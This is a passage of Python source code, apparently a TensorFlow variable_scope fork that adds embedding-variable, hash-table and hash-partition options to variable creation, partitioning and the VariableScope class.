            "When eager execution is enabled variable reuse is only supported"
            " when an EagerVariableStore is active. See the documentation on"
            " EagerVariableStore for example usage.")
      if self._store_eager_variables:
        reuse = AUTO_REUSE

    # If a *_ref type is passed in an error would be triggered further down the
    # stack. We prevent this using base_dtype to get a non-ref version of the
    # type, before doing anything else. When _ref types are removed in favor of
    # resources, this line can be removed.
    try:
      dtype = dtype.base_dtype
    except AttributeError:
      # .base_dtype not existing means that we will try and use the raw dtype
      # which was passed in - this might be a NumPy type which is valid.
      pass

    # This is the main logic of get_variable.  However, custom_getter
    # may override this logic.  So we save it as a callable and pass
    # it to custom_getter.
    # Note: the parameters of _true_getter, and their documentation, match
    # *exactly* item-for-item with the docstring of this method.
    def _true_getter(  # pylint: disable=missing-docstring
        name,
        shape=None,
        embedding_block_num=None,
        dtype=dtypes.float32,
        initializer=None,
        regularizer=None,
        reuse=None,
        trainable=None,
        collections=None,
        caching_device=None,
        partitioner=None,
        validate_shape=True,
        use_resource=None,
        constraint=None,
        synchronization=VariableSynchronization.AUTO,
        aggregation=VariableAggregation.NONE,
        invalid_key=None,
        evconfig=variables.EmbeddingVariableConfig(),
        ht_partition_num=1000):
      # A scalar shape ([]) cannot be partitioned, so it always takes the
      # single-variable path even when a partitioner is supplied.
      is_scalar = (
          shape is not None and isinstance(shape, collections_lib.Sequence) and
          not shape)
      # Partitioned variable case
      if partitioner is not None and not is_scalar:
        if not callable(partitioner):
          raise ValueError("Partitioner must be callable, but received: %s" %
                           partitioner)
        with ops.name_scope(None):
          return self._get_partitioned_variable(
              name=name,
              shape=shape,
              embedding_block_num=embedding_block_num,
              dtype=dtype,
              initializer=initializer,
              regularizer=regularizer,
              reuse=reuse,
              trainable=trainable,
              collections=collections,
              caching_device=caching_device,
              partitioner=partitioner,
              validate_shape=validate_shape,
              use_resource=use_resource,
              constraint=constraint,
              synchronization=synchronization,
              aggregation=aggregation,
              invalid_key=invalid_key,
              evconfig=evconfig,
              ht_partition_num=ht_partition_num)

      # Special case for partitioned variable to allow reuse without having to
      # specify partitioner.
      if (reuse is True and partitioner is None
          and name in self._partitioned_vars):
        return self._get_partitioned_variable(
            name=name,
            shape=shape,
            embedding_block_num=embedding_block_num,
            dtype=dtype,
            initializer=initializer,
            regularizer=regularizer,
            reuse=reuse,
            trainable=trainable,
            collections=collections,
            caching_device=caching_device,
            partitioner=None,
            validate_shape=validate_shape,
            use_resource=use_resource,
            constraint=constraint,
            synchronization=synchronization,
            aggregation=aggregation,
            invalid_key=invalid_key,
            evconfig=evconfig,
            ht_partition_num=ht_partition_num)

      # Single variable case
      if "%s/part_0" % name in self._vars:
        raise ValueError(
            "No partitioner was provided, but a partitioned version of the "
            "variable was found: %s/part_0. Perhaps a variable of the same "
            "name was already created with partitioning?" % name)

      return self._get_single_variable(
          name=name,
          shape=shape,
          embedding_block_num=embedding_block_num,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          validate_shape=validate_shape,
          use_resource=use_resource,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation,
          invalid_key=invalid_key,
          evconfig=evconfig,
          ht_partition_num=ht_partition_num)

    synchronization, aggregation, trainable = (
        variables.validate_synchronization_aggregation_trainable(
            synchronization, aggregation, trainable, name))

    if custom_getter is not None:
      # Handle backwards compatibility with getter arguments that were added
      # to the API after users started writing custom getters.
      custom_getter_kwargs = {
          "getter": _true_getter,
          "name": name,
          "shape": shape,
          "embedding_block_num": embedding_block_num,
          "dtype": dtype,
          "initializer": initializer,
          "regularizer": regularizer,
          "reuse": reuse,
          "trainable": trainable,
          "collections": collections,
          "caching_device": caching_device,
          "partitioner": partitioner,
          "validate_shape": validate_shape,
          "use_resource": use_resource,
          "synchronization": synchronization,
          "aggregation": aggregation,
          "invalid_key": invalid_key,
          "evconfig": evconfig,
          "ht_partition_num": ht_partition_num,
      }
      # `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
      # `lambda`.
      if ("constraint" in function_utils.fn_args(custom_getter) or
          function_utils.has_kwargs(custom_getter)):
        custom_getter_kwargs["constraint"] = constraint
      return custom_getter(**custom_getter_kwargs)
    else:
      return _true_getter(
          name,
          shape=shape,
          embedding_block_num=embedding_block_num,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          partitioner=partitioner,
          validate_shape=validate_shape,
          use_resource=use_resource,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation,
          invalid_key=invalid_key,
          evconfig=evconfig,
          ht_partition_num=ht_partition_num)
def _get_partitioned_variable(self,
                              name,
                              partitioner,
                              shape=None,
                              embedding_block_num=None,
                              dtype=dtypes.float32,
                              initializer=None,
                              regularizer=None,
                              reuse=None,
                              trainable=None,
                              collections=None,
                              caching_device=None,
                              validate_shape=True,
                              use_resource=None,
                              constraint=None,
                              synchronization=VariableSynchronization.AUTO,
                              aggregation=VariableAggregation.NONE,
                              invalid_key=None,
                              evconfig=variables.EmbeddingVariableConfig(),
                              ht_partition_num=1000):
  """Gets or creates a sharded variable list with these parameters.

  The `partitioner` must be a callable that accepts a fully defined
  `TensorShape` and returns a sequence of integers (the `partitions`).
  These integers describe how to partition the given sharded `Variable`
  along the given dimension. That is, `partitions[1] = 3` means split
  the `Variable` into 3 shards along dimension 1. Currently, sharding along
  only one axis is supported.

  If the list of variables with the given name (prefix) is already stored,
  we return the stored variables. Otherwise, we create a new one.

  Set `reuse` to `True` when you only want to reuse existing Variables.
  Set `reuse` to `False` when you only want to create new Variables.
  Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
  variables to be created if they don't exist or returned if they do.

  If initializer is `None` (the default), the default initializer passed in
  the constructor is used. If that one is `None` too, we use a new
  `glorot_uniform_initializer`. If initializer is a Tensor, we use
  it as a value and derive the shape from the initializer.

  If the initializer is a callable, then it will be called for each
  shard. Otherwise the initializer should match the shape of the entire
  sharded Variable, and it will be sliced accordingly for each shard.

  Some useful partitioners are available. See, e.g.,
  `variable_axis_size_partitioner` and `min_max_variable_partitioner`.

  Args:
    name: the name of the new or existing sharded variable.
    partitioner: Optional callable that accepts a fully defined `TensorShape`
      and `dtype` of the Variable to be created, and returns a list of
      partitions for each axis (currently only one axis can be partitioned).
    shape: shape of the new or existing sharded variable.
    embedding_block_num: forwarded to `_get_single_variable` for each shard.
      NOTE(review): presumably the number of blocks for a dynamic-dimension
      embedding variable — confirm against `kv_variable_ops`.
    dtype: type of the new or existing sharded variable (defaults to
      `DT_FLOAT`).
    initializer: initializer for the sharded variable.
    regularizer: a (Tensor -> Tensor or None) function; the result of applying
      it on a newly created variable will be added to the collection
      GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
    reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
      variables.
    trainable: If `True` also add the variable to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    collections: List of graph collections keys to add the Variable to.
      Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
    caching_device: Optional device string or function describing where the
      Variable should be cached for reading. Defaults to the Variable's
      device. If not `None`, caches on another device. Typical use is to
      cache on the device where the Ops using the Variable reside, to
      deduplicate copying through `Switch` and other conditional statements.
    validate_shape: If False, allows the variable to be initialized with a
      value of unknown shape. If True, the default, the shape of initial_value
      must be known.
    use_resource: If False, creates a regular Variable. If True, creates an
      experimental ResourceVariable which has well-defined semantics. Defaults
      to False (will later change to True).
    constraint: An optional projection function to be applied to the variable
      after being updated by an `Optimizer` (e.g. used to implement norm
      constraints or value constraints for layer weights). The function must
      take as input the unprojected Tensor representing the value of the
      variable and return the Tensor for the projected value (which must have
      the same shape). Constraints are not safe to use when doing asynchronous
      distributed training.
    synchronization: Indicates when a distributed a variable will be
      aggregated. Accepted values are constants defined in the class
      `tf.VariableSynchronization`. By default the synchronization is set to
      `AUTO` and the current `DistributionStrategy` chooses when to
      synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      `tf.VariableAggregation`.
    invalid_key: when not `None`, this call creates partitioned
      EmbeddingVariables instead of plain variables (the key marks entries
      to treat as invalid in the embedding's hash map).
    evconfig: an `EmbeddingVariableConfig` forwarded to each shard.
      NOTE(review): the default is a shared instance evaluated once at
      definition time — safe only if the config object is never mutated.
    ht_partition_num: hash-table partition count forwarded to each shard.

  Returns:
    A `PartitionedVariable` object.

  Raises:
    ValueError: when creating a new variable and shape is not declared,
      when reusing a variable and specifying a conflicting shape,
      when violating reuse during variable creation, or if an existing
      sharded variable exists for the given name but with different sharding.
  """
  initializing_from_value = initializer is not None and isinstance(
      initializer, ops.Tensor)
  if name in self._vars:
    raise ValueError(
        "A partitioner was provided, but an unpartitioned version of the "
        "variable was found: %s. Perhaps a variable of the same name was "
        "already created without partitioning?" % name)
  shape = tensor_shape.as_shape(shape)
  if initializing_from_value:
    shape = shape.merge_with(initializer.get_shape())
  if invalid_key is not None:
    # EmbeddingVariable: extend the shape so the regular Variable
    # partitioning machinery can be reused; the first dimension is unused.
    shape_t = tensor_shape.as_shape([sys.maxsize]).concatenate(shape)
    fd_partition_num = partitioner(shape=shape_t, dtype=dtype)[0]
    shape = tensor_shape.as_shape([fd_partition_num]).concatenate(shape)
  partitions = None
  if not reuse or partitioner:
    partitions = _call_partitioner(partitioner, shape, dtype)
  if name in self._partitioned_vars:
    # Reuse path: validate the request against the stored variable.
    if reuse is False:
      raise ValueError(
          "Partitioned variable with name %s already exists. Did you mean to "
          "set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)

    existing_var = self._partitioned_vars[name]
    # Deferred import to avoid a module-level import cycle with hash_table.
    from tensorflow.python.ops.hash_table import hash_table
    if isinstance(existing_var, (hash_table.HashTable, hash_table.DistributedHashTable)):
      raise ValueError(
          "Trying to reuse partitioned variable %s, but an existing variable is a"
          " HashTable or DistributedHashTable, can not reuse it." % (name))
    if not shape.is_compatible_with(existing_var.get_shape()):
      raise ValueError(
          "Trying to reuse partitioned variable %s, but specified shape %s "
          "and found shape %s." % (name, shape, existing_var.get_shape()))
    if not dtype.is_compatible_with(existing_var.dtype):
      raise ValueError(
          "Trying to reuse partitioned variable %s, but specified dtype %s "
          "and found dtype %s." % (name, dtype.name, existing_var.dtype.name))

    # pylint: disable=protected-access
    if (partitions is not None and
        existing_var._get_partitions() != partitions):
      raise ValueError(
          "Trying to reuse partitioned variable %s, but specified partitions "
          "%s and found partitions %s." %
          (name, partitions, existing_var._get_partitions()))
    # pylint: enable=protected-access

    return existing_var

  if reuse is True:
    raise ValueError("PartitionedVariable %s does not exist, or was not "
                     "created with tf.get_variable(). Did you mean to set "
                     "reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)

  slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)

  # Detect a partitioning mismatch against per-shard variables that were
  # created earlier (too few or too many shards for this name).
  if "%s/part_0" % name in self._vars:
    if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
      raise ValueError(
          "Partitioner returned a different partitioning than what was "
          "already found. Partitioner returned %d shards, and shard "
          "%s/part_0 was found, but %s/part_%d was not." %
          (num_slices, name, name, num_slices - 1))
    if "%s/part_%d" % (name, num_slices) in self._vars:
      raise ValueError(
          "Partitioner returned a different partitioning than what was "
          "already found. Partitioner returned %d shards, and shard "
          "%s/part_0 was found, but so was the extra shard %s/part_%d." %
          (num_slices, name, name, num_slices))

  vs = []
  for i, (var_offset, var_shape) in enumerate(
      _iter_slices(shape.as_list(), num_slices, slice_dim)):
    partition_info = _PartitionInfo(
        full_shape=shape.as_list(), var_offset=var_offset)
    var_full_name = "%s/part_%d" % (name, i)
    with ops.name_scope(var_full_name + "/PartitionedInitializer"):
      # Create the tensor to initialize the variable with default value.
      if initializer is None:
        init, initializing_from_value = self._get_default_initializer(
            name=name, shape=shape, dtype=dtype)
        if initializing_from_value:
          init_shape = None
        else:
          init_shape = var_shape
      elif callable(initializer):
        init = initializer
        init_shape = var_shape
      elif isinstance(initializer, ops.Tensor):
        # A concrete Tensor initializer is sliced per shard.
        init = array_ops.slice(initializer, var_offset, var_shape)
        # Use the dtype of the given tensor.
        dtype = init.dtype.base_dtype
        init_shape = None
      else:
        init = ops.convert_to_tensor(initializer, dtype=dtype)
        init = array_ops.slice(init, var_offset, var_shape)
        init_shape = None
      if invalid_key is not None:
        # EmbeddingVariable shards drop the synthetic first dimension.
        init_shape = shape.as_list()[1:]

    with ops.name_scope(None):
      var = self._get_single_variable(
          name=var_full_name,
          shape=init_shape,
          embedding_block_num=embedding_block_num,
          dtype=dtype,
          initializer=init,
          partition_info=partition_info,
          regularizer=regularizer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          validate_shape=validate_shape,
          use_resource=use_resource,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation,
          invalid_key=invalid_key,
          evconfig=evconfig,
          ht_partition_num=ht_partition_num)

      # pylint: disable=protected-access
      # Record where this shard sits inside the full variable so that
      # checkpointing can stitch the shards back together.
      var._set_save_slice_info(
          variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
                                           var_shape, var_full_name=var_full_name))
      if isinstance(var, kv_variable_ops.DynamicEmbeddingVariable):
        for ev in var._ev_list:
          ev._set_save_slice_info(variables.Variable.SaveSliceInfo(
              ev.name, shape.as_list(), var_offset, var_shape, var_full_name=var_full_name))
      vs.append(var)
      # pylint: enable=protected-access

  partitioned_var = variables.PartitionedVariable(
      name=name,
      shape=shape,
      dtype=dtype,
      variable_list=vs,
      partitions=partitions)
  if not context.executing_eagerly() or self._store_eager_variables:
    self._partitioned_vars[name] = partitioned_var
  return partitioned_var
def _get_single_variable(self,
                         name,
                         shape=None,
                         embedding_block_num=None,
                         dtype=dtypes.float32,
                         initializer=None,
                         regularizer=None,
                         partition_info=None,
                         reuse=None,
                         trainable=None,
                         collections=None,
                         caching_device=None,
                         validate_shape=True,
                         use_resource=None,
                         constraint=None,
                         synchronization=VariableSynchronization.AUTO,
                         aggregation=VariableAggregation.NONE,
                         invalid_key=None,
                         evconfig=variables.EmbeddingVariableConfig(),
                         ht_partition_num=1000):
  """Get or create a single Variable (e.g.

  a shard or entire variable).

  See the documentation of get_variable above (ignore partitioning components)
  for details.

  Args:
    name: see get_variable.
    shape: see get_variable.
    embedding_block_num: forwarded to `variables.VariableV1`. NOTE(review):
      presumably the block count for dynamic-dimension embedding variables —
      confirm against `kv_variable_ops`.
    dtype: see get_variable.
    initializer: see get_variable.
    regularizer: see get_variable.
    partition_info: _PartitionInfo object.
    reuse: see get_variable.
    trainable: see get_variable.
    collections: see get_variable.
    caching_device: see get_variable.
    validate_shape: see get_variable.
    use_resource: see get_variable.
    constraint: see get_variable.
    synchronization: see get_variable.
    aggregation: see get_variable.
    invalid_key: when not `None`, an EmbeddingVariable is created instead of
      a plain variable (forwarded to `variables.VariableV1`).
    evconfig: `EmbeddingVariableConfig` forwarded to `variables.VariableV1`.
      NOTE(review): the default is a shared instance evaluated once at
      definition time — safe only if the config object is never mutated.
    ht_partition_num: hash-table partition count forwarded to
      `variables.VariableV1`.

  Returns:
    A Variable. See documentation of get_variable above.

  Raises:
    ValueError: See documentation of get_variable above.
  """
  # Set to true if initializer is a constant.
  initializing_from_value = False
  if initializer is not None and not callable(initializer):
    initializing_from_value = True
  if shape is not None and initializing_from_value:
    raise ValueError("If initializer is a constant, do not specify shape.")

  dtype = dtypes.as_dtype(dtype)
  shape = tensor_shape.as_shape(shape)

  if name in self._vars:
    # Here we handle the case when returning an existing variable.
    if reuse is False:
      var = self._vars[name]
      err_msg = ("Variable %s already exists, disallowed."
                 " Did you mean to set reuse=True or "
                 "reuse=tf.AUTO_REUSE in VarScope?" % name)
      # ResourceVariables don't have an op associated with so no traceback
      if isinstance(var, resource_variable_ops.ResourceVariable):
        raise ValueError(err_msg)
      tb = var.op.traceback[::-1]
      # Throw away internal tf entries and only take a few lines. In some
      # cases the traceback can be longer (e.g. if someone uses factory
      # functions to create variables) so we take more than needed in the
      # default case.
      tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
      raise ValueError("%s Originally defined at:\n\n%s" %
                       (err_msg, "".join(traceback.format_list(tb))))
    found_var = self._vars[name]
    # Deferred import to avoid a module-level import cycle with hash_table.
    from tensorflow.python.ops.hash_table import hash_table
    if isinstance(found_var, (hash_table.HashTable, hash_table.DistributedHashTable)):
      raise ValueError(
          "Trying to reuse variable %s, but an existing variable is a"
          " HashTable or DistributedHashTable, can not reuse it." % (name))
    if not shape.is_compatible_with(found_var.get_shape()):
      raise ValueError("Trying to share variable %s, but specified shape %s"
                       " and found shape %s." %
                       (name, shape, found_var.get_shape()))
    if not dtype.is_compatible_with(found_var.dtype):
      dtype_str = dtype.name
      found_type_str = found_var.dtype.name
      raise ValueError("Trying to share variable %s, but specified dtype %s"
                       " and found dtype %s." %
                       (name, dtype_str, found_type_str))
    return found_var

  # The code below handles only the case of creating a new variable.
  if reuse is True:
    raise ValueError("Variable %s does not exist, or was not created with "
                     "tf.get_variable(). Did you mean to set "
                     "reuse=tf.AUTO_REUSE in VarScope?" % name)

  # Create the tensor to initialize the variable with default value.
  if initializer is None:
    initializer, initializing_from_value = self._get_default_initializer(
        name=name, shape=shape, dtype=dtype)
  # Enter an init scope when creating the initializer.
  with ops.init_scope():
    if initializing_from_value:
      init_val = initializer
      variable_dtype = None
    else:
      # Instantiate initializer if provided initializer is a type object.
      if tf_inspect.isclass(initializer):
        initializer = initializer()
      if shape is not None and shape.is_fully_defined():
        init_val = lambda: initializer(  # pylint: disable=g-long-lambda
            shape.as_list(),
            dtype=dtype,
            partition_info=partition_info)
        variable_dtype = dtype.base_dtype
      elif len(tf_inspect.getargspec(initializer).args) == len(
          tf_inspect.getargspec(initializer).defaults or []):
        # Initializer is callable with no required args; use it as-is and
        # let the variable infer shape and dtype from its result.
        init_val = initializer
        variable_dtype = None
      else:
        raise ValueError("The initializer passed is not valid. It should "
                         "be a callable with no arguments and the "
                         "shape should not be provided or an instance of "
                         "`tf.keras.initializers.*' and `shape` should be "
                         "fully defined.")

  # Create the variable.
  if use_resource is None:
    # Set the default value if unspecified.
    use_resource = _DEFAULT_USE_RESOURCE
  v = variables.VariableV1(
      initial_value=init_val,
      name=name,
      trainable=trainable,
      collections=collections,
      caching_device=caching_device,
      embedding_block_num=embedding_block_num,
      dtype=variable_dtype,
      validate_shape=validate_shape,
      constraint=constraint,
      use_resource=use_resource,
      synchronization=synchronization,
      aggregation=aggregation,
      invalid_key=invalid_key,
      evconfig=evconfig,
      embedding_initializer=initializer,
      ht_partition_num=ht_partition_num)
  if context.executing_eagerly() and self._store_eager_variables:
    # In eager mode collections are not populated automatically, so mirror
    # the graph-mode collection behavior by hand.
    if collections:
      ops.add_to_collections(collections, v)
    else:
      ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
    if trainable:
      ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)

  if not context.executing_eagerly() or self._store_eager_variables:
    # In eager mode we do not want to keep default references to Variable
    # objects as this will prevent their memory from being released.
    self._vars[name] = v
  logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
               format(shape), initializer)

  # Run the regularizer if requested and save the resulting loss.
  if regularizer:
    with ops.colocate_with(v):
      with ops.name_scope(name + "/Regularizer/"):
        with ops.init_scope():
          loss = regularizer(v)
        if loss is not None:
          if context.executing_eagerly():
            v_name = "v_%s" % type(v)
            loss_name = "loss_%s" % type(loss)
          else:
            v_name = v.name
            loss_name = loss.name
          logging.vlog(
              1, "Applied regularizer to %s and added the result %s "
              "to REGULARIZATION_LOSSES.", v_name, loss_name)
          ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
  return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
  """Return a default initializer and an initializing_from_value flag.

  Floating-point variables default to Glorot-uniform; integer, unsigned,
  boolean and string variables default to zeros. Any other dtype has no
  sensible default and raises.

  Args:
    name: see get_variable; used only in the error message.
    shape: see get_variable; unused for choosing the default.
    dtype: see get_variable.

  Returns:
    An (initializer, initializing_from_value) pair. The flag is always
    False since neither default is a constant Tensor value.

  Raises:
    ValueError: When giving unsupported dtype.
  """
  del shape  # The default depends only on the dtype.
  if dtype.is_floating:
    return init_ops.glorot_uniform_initializer(), False
  if (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
      dtype == dtypes.string):
    return init_ops.zeros_initializer(), False
  raise ValueError("An initializer for variable %s of %s is required" %
                   (name, dtype.base_dtype))
# Pass this as `regularizer` to explicitly disable regularization.
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
  """A regularizer that applies no penalty.

  Supplying this to `get_variable` (or a variable scope) overrides any
  default regularizer; the returned loss is always `None`, so nothing is
  added to REGULARIZATION_LOSSES.
  """
  return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
  """Variable scope object to carry defaults to provide to `get_variable`.

  Many of the arguments we need for `get_variable` in a variable store are most
  easily handled with a context. This object is used for the defaults.

  Attributes:
    name: name of the current scope, used as prefix in get_variable.
    initializer: default initializer passed to get_variable.
    regularizer: default regularizer passed to get_variable.
    reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
      get_variable. When eager execution is enabled this argument is always
      forced to be False.
    caching_device: string, callable, or None: the caching device passed to
      get_variable.
    partitioner: callable or `None`: the partitioner passed to `get_variable`.
    custom_getter: default custom getter passed to get_variable.
    name_scope: The name passed to `tf.name_scope`.
    dtype: default type passed to get_variable (defaults to DT_FLOAT).
    use_resource: if False, create a normal Variable; if True create an
      experimental ResourceVariable with well-defined semantics. Defaults to
      False (will later change to True). When eager execution is enabled this
      argument is always forced to be True.
    constraint: An optional projection function to be applied to the variable
      after being updated by an `Optimizer` (e.g. used to implement norm
      constraints or value constraints for layer weights). The function must
      take as input the unprojected Tensor representing the value of the
      variable and return the Tensor for the projected value (which must have
      the same shape). Constraints are not safe to use when doing asynchronous
      distributed training.
  """

  def __init__(self,
               reuse,
               name="",
               initializer=None,
               regularizer=None,
               caching_device=None,
               partitioner=None,
               custom_getter=None,
               name_scope="",
               dtype=dtypes.float32,
               use_resource=None,
               constraint=None):
    """Creates a new VariableScope with the given properties."""
    self._name = name
    self._initializer = initializer
    self._regularizer = regularizer
    self._reuse = reuse
    self._caching_device = caching_device
    self._partitioner = partitioner
    self._custom_getter = custom_getter
    self._name_scope = name_scope
    self._dtype = dtype
    self._use_resource = use_resource
    self._constraint = constraint
    if context.executing_eagerly():
      # Eager mode forces AUTO_REUSE + resource variables and cannot cache.
      if self._caching_device is not None:
        raise NotImplementedError("Caching devices is not yet supported "
                                  "when eager execution is enabled.")
      self._reuse = AUTO_REUSE
      self._use_resource = True

  @property
  def name(self):
    """Name of this scope, used as the variable-name prefix."""
    return self._name

  @property
  def original_name_scope(self):
    """The name scope captured when this variable scope was created."""
    return self._name_scope

  @property
  def reuse(self):
    """Reuse mode: True, False, None, or AUTO_REUSE."""
    return self._reuse

  @property
  def initializer(self):
    """Default initializer for variables created in this scope."""
    return self._initializer

  @property
  def dtype(self):
    """Default dtype for variables created in this scope."""
    return self._dtype

  @property
  def use_resource(self):
    """Whether variables default to ResourceVariable in this scope."""
    return self._use_resource

  @property
  def regularizer(self):
    """Default regularizer for variables created in this scope."""
    return self._regularizer

  @property
  def caching_device(self):
    """Default caching device for variables created in this scope."""
    return self._caching_device

  @property
  def partitioner(self):
    """Default partitioner for variables created in this scope."""
    return self._partitioner

  @property
  def custom_getter(self):
    """Default custom getter for variables created in this scope."""
    return self._custom_getter

  @property
  def constraint(self):
    """Default constraint for variables created in this scope."""
    return self._constraint

  def reuse_variables(self):
    """Reuse variables in this scope."""
    self._reuse = True

  def set_initializer(self, initializer):
    """Set initializer for this scope."""
    self._initializer = initializer

  def set_dtype(self, dtype):
    """Set data type for this scope."""
    self._dtype = dtype

  def set_use_resource(self, use_resource):
    """Sets whether to use ResourceVariables for this scope."""
    if context.executing_eagerly() and not use_resource:
      raise ValueError("When eager execution is enabled, "
                       "use_resource cannot be set to false.")
    self._use_resource = use_resource

  def set_regularizer(self, regularizer):
    """Set regularizer for this scope."""
    self._regularizer = regularizer

  def set_caching_device(self, caching_device):
    """Set caching_device for this scope."""
    if context.executing_eagerly():
      raise NotImplementedError("Caching devices are not yet supported "
                                "when eager execution is enabled.")
    self._caching_device = caching_device

  def set_partitioner(self, partitioner):
    """Set partitioner for this scope."""
    self._partitioner = partitioner

  def set_custom_getter(self, custom_getter):
    """Set custom getter for this scope."""
    self._custom_getter = custom_getter

  def get_collection(self, name):
    """Get this scope's variables."""
    scope = self._name + "/" if self._name else ""
    return ops.get_collection(name, scope)

  def trainable_variables(self):
    """Get this scope's trainable variables."""
    return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)

  def global_variables(self):
    """Get this scope's global variables."""
    return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)

  def local_variables(self):
    """Get this scope's local variables."""
    return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)

  def get_variable(self,
                   var_store,
                   name,
                   shape=None,
                   dtype=None,
                   initializer=None,
                   regularizer=None,
                   reuse=None,
                   trainable=None,
                   collections=None,
                   caching_device=None,
                   partitioner=None,
                   validate_shape=True,
                   use_resource=None,
                   custom_getter=None,
                   constraint=None,
                   synchronization=VariableSynchronization.AUTO,
                   aggregation=VariableAggregation.NONE):
    """Gets an existing variable with this name or create a new one."""
    # Fall back to this scope's defaults for any unspecified argument.
    if regularizer is None:
      regularizer = self._regularizer
    if caching_device is None:
      caching_device = self._caching_device
    if partitioner is None:
      partitioner = self._partitioner
    if custom_getter is None:
      custom_getter = self._custom_getter
    if context.executing_eagerly():
      reuse = False
      use_resource = True
    else:
      if reuse is None:
        reuse = self._reuse
      if use_resource is None:
        use_resource = self._use_resource

    full_name = self.name + "/" + name if self.name else name
    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # Check that `initializer` dtype and `dtype` are consistent before
      # replacing them with defaults.
      if (dtype is not None and initializer is not None and
          not callable(initializer)):
        init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
        if init_dtype != dtype:
          raise ValueError("Initializer type '%s' and explicit dtype '%s' "
                           "don't match." % (init_dtype, dtype))
      if initializer is None:
        initializer = self._initializer
      if constraint is None:
        constraint = self._constraint
      if dtype is None:
        dtype = self._dtype
      return var_store.get_variable(
          full_name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          partitioner=partitioner,
          validate_shape=validate_shape,
          use_resource=use_resource,
          custom_getter=custom_getter,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation)

  def get_hash_table(self,
                     var_store,
                     name,
                     shape=None,
                     dtype=None,
                     initializer=None,
                     collections=None,
                     reuse=None,
                     trainable=True,
                     synchronization=VariableSynchronization.AUTO,
                     partitioner=None,
                     children=None):
    """Gets an existing variable with this name or create a new one."""
    # Fall back to this scope's defaults for any unspecified argument.
    if partitioner is None:
      partitioner = self._partitioner
    if not context.executing_eagerly():
      if reuse is None:
        reuse = self._reuse
    else:
      reuse = AUTO_REUSE

    full_name = self.name + "/" + name if self.name else name
    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # Check that `initializer` dtype and `dtype` are consistent before
      # replacing them with defaults.
      if (dtype is not None and initializer is not None and
          not callable(initializer)):
        init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
        if init_dtype != dtype:
          raise ValueError("Initializer type '%s' and explicit dtype '%s' "
                           "don't match." % (init_dtype, dtype))
      if initializer is None:
        initializer = self._initializer
      if dtype is None:
        dtype = self._dtype
      return var_store.get_hashtable(full_name,
                                     shape=shape,
                                     dtype=dtype,
                                     initializer=initializer,
                                     reuse=reuse,
                                     collections=collections,
                                     trainable=trainable,
                                     synchronization=synchronization,
                                     partitioner=partitioner,
                                     children=children)

  def get_embedding_variable(self,
                             var_store,
                             name,
                             shape=None,
                             dtype=None,
                             initializer=None,
                             regularizer=None,
                             reuse=None,
                             trainable=True,
                             collections=None,
                             caching_device=None,
                             partitioner=None,
                             validate_shape=True,
                             use_resource=None,
                             custom_getter=None,
                             constraint=None,
                             invalid_key=None,
                             evconfig=variables.EmbeddingVariableConfig(),
                             ht_partition_num=1000):
    """Gets an existing variable with this name or create a new one."""
    # Fall back to this scope's defaults for any unspecified argument.
    if regularizer is None:
      regularizer = self._regularizer
    if caching_device is None:
      caching_device = self._caching_device
    if partitioner is None:
      partitioner = self._partitioner
    if custom_getter is None:
      custom_getter = self._custom_getter
    if not context.executing_eagerly():
      if reuse is None:
        reuse = self._reuse
      if use_resource is None:
        use_resource = self._use_resource
    else:
      reuse = AUTO_REUSE
      use_resource = True

    full_name = self.name + "/" + name if self.name else name
    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # Check that `initializer` dtype and `dtype` are consistent before
      # replacing them with defaults.
      if (dtype is not None and initializer is not None and
          not callable(initializer)):
        init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
        if init_dtype != dtype:
          raise ValueError("Initializer type '%s' and explicit dtype '%s' "
                           "don't match." % (init_dtype, dtype))
      if initializer is None:
        initializer = self._initializer
      if constraint is None:
        constraint = self._constraint
      if dtype is None:
